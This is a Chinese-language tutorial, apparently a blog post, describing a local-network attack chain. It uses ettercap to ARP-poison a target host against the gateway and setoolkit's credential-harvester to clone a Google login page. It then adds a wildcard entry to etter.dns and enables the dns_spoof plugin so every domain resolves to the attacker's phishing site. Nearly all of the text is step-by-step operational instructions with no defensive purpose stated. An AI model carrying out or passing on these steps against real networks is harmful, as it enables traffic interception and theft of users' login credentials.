ettercap arp欺骗+dns劫持+钓鱼网站
简介
这次主要是使用ettercap在局域网中发现主机并欺骗其arp表,让其mac地址与攻击主机mac一致,使用dns污染其dns解析,将其访问的域名解析到本机的钓鱼网站中。
注意!
ettercap使用要一次完成,在多次测试中发现,重新arp欺骗会无法生效,原因不知。
步骤
发现局域网主机
在kali中打开ettercap1
ettercap -G
选择对应的接口,点击√号,再点击放大镜,再点击服务器
192.168.0.1:网关
192.168.0.197:靶机
arp欺骗
点击靶机,再点击add to target1
点击网关,再点击add to target2
点击地球图标,点击arp poisoning,点击ok
可在靶机上查看arp表,发现网关mac和本机mac一致,欺骗成功;但是访问正常,可能会短暂无法访问互联网。
制作钓鱼网站
使用setoolkit社工软件制作1
setoolkit
来个好看的封面
选择11
2
3
4
5
6
7
81)Social-Engineering Attacks:社会工程学攻击
2)Penetration Testing(Fast-Track):渗透测试(快速通道)
3)Third Party Modules:第三模块
4)Update the Social-Engineer Toolkit:更新社会工程学工具包
5)Update SET configuration:更新SET配置
6)Help, Credits, and About:帮助、致谢和关于
99)Exit the Social-Engineer Toolkit:退出
选择21
2
3
4
5
6
7
8
9
10
11
121)鱼叉式网络钓鱼攻击向量
2)网站攻击向量
3)感染性媒体生成器
4)创建载荷和监听器
5)批量邮件攻击
6)基于Arduino的攻击向量
7)无线接入点攻击向量
8)QR码生成器攻击向量
9)PowerShell攻击向量
10)第三方模块
99)返回主菜单。
选择31
2
3
4
5
6
7
8
91)Java小程序攻击方法
2)Metasploit浏览器漏洞利用方法
3)凭证收集攻击方法
4)Tabnabbing攻击方法
5)Web劫持攻击方法
6)多攻击网络方法
7)HTA攻击方法
99)返回主菜单
随意,我这里选择1,比较方便1
2
3
4
51)网络模板
2)网站克隆器
3)自定义导入
99)返回网络攻击菜单
然后输入要被访问的ip,选择谷歌模板,网站制作完成。
dns劫持
配置ettercap的dns劫持配置文件1
vim /etc/ettercap/etter.dns
末尾添加以下内容1
* A 192.168.0.194
意思是所有域名均解析成后面的ip
点击软件三个点,然后选择plugins,再选择manage plugins
双击dns_spoof即可






















